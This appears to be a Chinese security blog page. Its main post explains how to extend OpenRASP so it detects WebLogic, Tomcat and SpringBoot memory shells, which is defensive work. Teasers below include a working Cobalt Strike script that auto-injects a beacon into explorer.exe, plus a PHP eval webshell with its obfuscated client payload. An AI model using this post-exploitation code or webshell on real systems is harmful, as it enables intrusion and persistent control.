OpenRASP攻防之内存马防御

    “Gartner在2014年提出了应用自我保护技术(RASP)的概念,即将防护引擎嵌入到应用内部,不再依赖外部防护设备。OpenRASP是该技术的开源实现,可以在不依赖请求特征的情况下,准确的识别代码注入、反序列化等应用异常,很好的弥补了传统设备防护滞后的问题。”但是OpenRASP仍有其不足之处。根据测试,OpenRasp无法对内存马进行检测,所以便想对OpenRasp进行二次开发来检测内存马。
    根据OpenRasp官网的说明文档,要对OpenRASP二次开发,为Java服务器添加新的hook点大致分为三步,第一步为添加hook点,根据自己的hook点在com.baidu.openrasp.hook包中欧给添加一个继承自AbstractClassHook的类,并实现getType和isClassMatched两个方法进行hook点的匹配,并在hookMethod方法中的内部类的onMethodEnte方法和onMethodExit方法进行hook点前后的逻辑插入,并实现的hook点加入com.baidu.openrasp.transformer.CustomClassTransformer的构造方法中,实现字节码的转换;第二步添加检测类型,在 com.baidu.openrasp.plugin.checker.CheckParameter 中添加相应的检测类型;第三步为构造参数并进入checker,编写hook点中调用的方法,来实现具体的检测逻辑,检测逻辑中可以调用js插件。
    通过分析网上weblogic filter内存马的注入代码,发现关键函数为registerFilter,因此可以定义一个hook类,hookMethod匹配该函数,并且该函数的第一、第二、第三个参数分别为filter名称、filter类名、filter的访问url,所以可以将这三个参数传递到要插入到hook点前的代码中,检测代码将这些参数给第三步的自定义checker,checker主要根据这些参数创建详细的告警日志,方便网络安全运维人员后期查看分析、溯源等。
    通过分析哥斯拉webshell管理工具的tomcat servlet内存马注入代码和逻辑,发现关键函数为调用addWrapper,tomcat目前的主要版本为6-10,由于该函数在不同的版本中函数签名信息不同,所以需要针对不同的版本进行hook。经过分析该函数的签名可分为三类,分别为6,7,8-10,故在hook前先利用ServerInfo类的getServerInfo函数获取到tomcat版本号。addWrapper函数的第二、第三个参数分别为servlet的访问url、要填的servlet封装类wrapper,所以可以将这两个参数传递到要插入到hook点前的代码中,通过依次反射调用wrapper的getServletName和getServletClass可获取servlet的名称和servlet的类名,检测代码将这些信息传递给第三步的自定义checker,checker主要根据这些参数创建详细的告警日志。
    通过分析网上SpringBoot controller内存马的注入代码,发现关键函数为registerMapping,因此可定义一个hook类,hookMethod匹配该函数,并且该函数的第一、第二参数分别为http请求的封装类requestMappingInfo、controller类,所以可以将这两个参数传递到要插入到hook点前的代码中,通过依次反射调用getPatternsCondition、getPatterns可获取controller的访问url和controller的类名,检测代码将这些参数传递给第三步的自定义checker,checker主要根据这些参数创建详细的告警日志。
    下面为weblogic内存马的检测效果截图
    
    
    tomcat内存马的检测效果截图

    SpringBoot内存马的检测效果截图

    插件检测哥斯拉

评论

发表评论

此博客中的热门博文

Cobalt Strike automigrate自动迁移进程脚本

    metasploit有个功能叫auto migrate 可以自动把meterpreter移动到其他进程,不过Cobalt Strike却没有这个功能,在网上搜到一个移动到进程id的aggressor脚本,不过用了下发现有问题,另外如果只是想移动到指定id的进程的话还不如用Cobalt Strike自带的inject命令。遂想自己写个脚本,实现beacon上线后自动注入到指定进程名,还能根据当前的beacon所在的进程是32位还是64位来自动选择binject的注入类型。     先贴下写好的脚本内容: on beacon_initial { sub callback { $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+'; $listener = "test"; if ($2 ismatch $regex) { $pid = matched()[1]; $inject_pid = $pid; if (-is64 $1) { $arch = "x64"; } else { $arch = "x86"; } binject($1, $pid, $listener, $arch); } } if($inject_pid != beacon_info($1,"pid")) { bps($1, &callback); } }     脚本不难,讲下编写过程中遇到的几个坑:     1、正则表达式的编写     bps返回的进程列表大致如下:     sppsvc.exe 648 368     svchost.exe 648 444     WmiPrvSE.exe 788 1596     msdtc.exe 648 2740     .....     在写正则表达式的时候以为上面的进程列表每行字符串分割是空格,结果发现是tab(\t),另外每行是以\n来换行的,而且正则表达式的字符串要用单引号包裹,用双引号发现怎么都匹配不上。     2、不停注入的问题     当
阅读全文

菜刀连接php一句话木马返回200的原因及解决方法

图片
    一句话木马的内容为“<?php @eval($_POST["abc"])?>”,用菜刀连接直接返回200          可是hackbar中执行命令却没有问题          很奇怪。后来在看雪上看到也有人发类似的 帖子 ,评论有人提到是php7版本过高的问题,搜了下确实是这样,php manual 中提到: Dynamic calls for certain functions have been forbidden (in the form of $func() or array_map('extract', ...), etc). These functions either inspect or modify another scope, and present with them ambiguous and unreliable behavior. The functions are as follows: assert() - with a string as the first argument      即php7中动态调用一些函数是被禁止的,比如在array_map中调用assert,否则会提示      Warning: Cannot call func_num_args() dynamically in %s on line %d     把一句话里的@符号去掉,则同样会报错“Cannot call assert() with string argument dynamically in ...shell.php(1) : eval()'d code on line 1 ”。       从返回内容可以看到php版本为7.1.6。抓包看了下菜刀的发包,的确用到了array_map("assert"..)          所以只要在菜刀的配置文件里把  array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."
阅读全文

vultr安装kali linux 折腾笔记

图片
    打算在vultr上安装kali linux 2017.1 64位,可是安装完重启后kali又进入了安装界面,后来查到网上说系统安装到“finish the installation”这步时,移除ISO文件,避免再次从光盘启动,可是移除ISO重启后一直卡在启动界面,黑屏并提示“booting from disk”,重新安装多少次都无效。     一度怀疑kali 没有成功安装grub。搜索发现 How to set NOMODESET and other kernel boot options in grub2  提到最新的linux把视频模式集成到了内核中,但是一些视频卡有问题会导致黑屏,解决方式就是添加nomodeset参数让内核不去加载视频驱动而是使用bios模式直到X驱动加载完,也提到可以启动时按“e”来编辑grub配置。  The newest kernels have moved the video mode setting into the kernel. So all the programming of the hardware specific clock rates and registers on the video card happen in the kernel rather than in the X driver when the X server starts.. This makes it possible to have high resolution nice looking splash (boot) screens and flicker free transitions from boot splash to login screen. Unfortunately, on some cards this doesnt work properly and you end up with a black screen. Adding the nomodeset parameter instructs the kernel to not load video drivers and use BIOS modes instead until X is loaded.      可是不知道是不是我的姿势不对,我按“
阅读全文